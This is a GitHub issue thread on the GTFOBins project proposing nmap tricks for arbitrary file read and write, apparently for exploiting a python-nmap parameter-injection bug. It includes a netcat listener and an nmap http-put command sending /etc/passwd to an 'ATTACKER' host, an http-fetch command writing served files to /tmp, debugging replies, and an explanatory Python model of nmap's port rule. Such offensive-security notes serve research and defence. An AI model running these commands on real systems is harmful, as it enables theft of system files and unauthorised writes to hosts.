GTFOBins / GTFOBins.github.io

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
https://gtfobins.github.io
GNU General Public License v3.0

nmap read/write tricks #67

Closed s0i37 closed 5 years ago

s0i37 commented 5 years ago

Hello. Sorry, I do not have enough time to create a pull request. I want to suggest a few tricks that helped me with exploiting https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection without direct access to the file system.

arbitrary file read

```
# on ATTACKER: listen on port 80 and print whatever arrives
nc -nv -lp 80
# on the scanning host: http-put uploads the named file to the listener
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
```

arbitrary file write

```
# on ATTACKER: serve the current directory with a router that lists it
php -S 0.0.0.0:80 -t . router_with_directory_listing.php
# on the scanning host: http-fetch saves the served files under destination
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'
```

cyrus-and commented 5 years ago

I'm having a hard time getting these to work; all I get is a successful scan but no HTTP traffic.

In terminal A (no output):

```
$ socat -v tcp-listen:1234,reuseaddr,fork -
```

In terminal B:

```
$ nmap -p 1234 127.0.0.1 --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-28 13:17 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).

PORT     STATE SERVICE
1234/tcp open  hotline

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
```

s0i37 commented 5 years ago

This happens because nmap isn't sure that 1234 is a web port. Usually some NSE scripts require service type determination. I suggest you use port 8080, because nmap thinks that is a web port by default, like 80.
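The service-detection point in the reply above, as an added illustration that is not part of this thread or of GTFOBins: a small Python model of how an NSE http script's port rule decides whether to run at all. The port and service-name sets are an assumption modelled on nmap's `shortport.http` rule (a simplification, not copied from nmap), and the default service names are a constructed excerpt in the style of the `nmap-services` table.

```python
"""
Model of the decision an Nmap NSE http script makes before running.

This is an added illustration, not nmap code. It reproduces the shape of
nmap's shortport.http port rule: fire when the port number is a well-known
HTTP port, or when the service name nmap recorded for the port looks like
HTTP. Without -sV that name is only a table lookup; with -sV it comes from
probing the service.
"""
from dataclasses import dataclass

# Assumption: approximation of nmap's LIKELY_HTTP_PORTS / LIKELY_HTTP_SERVICES.
LIKELY_HTTP_PORTS = {80, 443, 631, 8000, 8080, 8088, 8180, 8443}
LIKELY_HTTP_SERVICES = {"http", "https", "http-alt", "https-alt", "http-proxy"}

# Constructed excerpt in the style of nmap-services: the name nmap guesses
# for a port when no version detection has been done.
DEFAULT_SERVICE_NAMES = {80: "http", 443: "https", 1234: "hotline", 8080: "http-proxy"}


@dataclass
class Port:
    number: int
    protocol: str = "tcp"
    state: str = "open"
    service: str = ""               # service name nmap recorded for the port
    version_detected: bool = False  # True only when -sV probed the service


def build_port(number, banner_service=None):
    """Return the port entry as nmap's table would hold it.

    banner_service=None models a scan without -sV: the name is a lookup in
    the constructed nmap-services excerpt. Otherwise the name is whatever
    version detection identified.
    """
    if banner_service is not None:
        return Port(number, service=banner_service, version_detected=True)
    return Port(number, service=DEFAULT_SERVICE_NAMES.get(number, "unknown"))


def http_portrule(port):
    """Equivalent of shortport.http: port number OR service name must match."""
    if port.protocol != "tcp" or port.state != "open":
        return False
    return port.number in LIKELY_HTTP_PORTS or port.service in LIKELY_HTTP_SERVICES


def script_would_run(number, with_sv=False, real_service="unknown"):
    """Simulate `nmap -p <number> [-sV]` and report whether an http-* script
    (http-put, http-fetch, ...) would be scheduled for that port."""
    port = build_port(number, banner_service=real_service if with_sv else None)
    return http_portrule(port)


if __name__ == "__main__":
    # The cases from the thread: 1234 without -sV is named "hotline" and is
    # skipped; 8080 matches by port number; 1234 with -sV matches only if the
    # probe actually identifies HTTP.
    for args in [(1234,), (8080,), (1234, True, "http"), (1234, True, "hotline")]:
        print(args, "->", "runs" if script_would_run(*args) else "skipped")
```

In the scan report quoted above, port 1234 carries the table name `hotline`, so neither branch of the rule matches and http-put is never scheduled even though the port is open; 8080 matches by number alone, which is why the suggestion works. The `-sV` case shows the other route: a service on an unusual port is reached only when version detection labels it as HTTP.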

cyrus-and commented 5 years ago

This sucks... but that was the reason, thanks.